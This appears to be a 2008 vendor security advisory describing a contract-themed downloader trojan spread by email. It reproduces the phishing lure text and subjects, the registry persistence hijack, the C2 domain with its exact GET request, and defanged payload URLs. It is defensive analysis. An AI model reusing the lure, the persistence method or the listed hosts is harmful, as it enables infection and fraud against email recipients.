New Contract Downloader Trojan

August 20, 2008

Starting August 19, 2008, we are seeing a new Downloader-Trojan being spammed on the Internet. It arrives as an e-mail attachment in a zip archive. The e-mails look like following:

Attachment: contract-N3.zip (contains file contract-N3.exe)

Subjects:

  • Your new labour contract
  • Contract of Retirement
  • Contract of settlements
  • Loan Contract
  • Permit for retirement
  • Record in debit of account

Message Body:

------------------

Dear Sirs,

We have prepared a contract and added the paragraphs that you wanted to see in it. Our lawyers made alterations on the last page. If you agree with all the provisions we are ready to make the payment on Friday for the first consignment.

We are enclosing the file with the prepared contract.

If necessary, we can send it by fax. Looking forward to your decision.

------------------

Upon execution, the malware executable creates a directory C:Program FilesMicrosoft Common and drops a copy of itself as wuauclt.exe. It also adds the following registry entry to automaticaly start itself on system reboot:

HKLM...Image File Execution Optionsexplorer.exeDebugger: C:Program FilesMicrosoft Commonwuauclt.exe

The Trojan also tries to connect to aaszxu.ru domain which is hosted in UKRAINE and sends following GET request to it:

GET /load3/ld.php?v=1&rs=615903122&n=1 HTTP/1.0 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914) Host: aaszxu.ru

This GET request in return loads following URLs which keeps changing and points to another Trojan [detected as GAV: Wigon.EG (Trojan) by SonicWALL]:

  • hxxp://REMOVEDshclub.ro/img/scan.exe
  • hxxp://REMOVEDmickel.de/cerec/bilder/scan.exe
  • hxxp://REMOVEDnocorp.com/images/scan.exe

SonicWALL detects this new Trojan downloader as GAV: FakeAlert.GP (Trojan).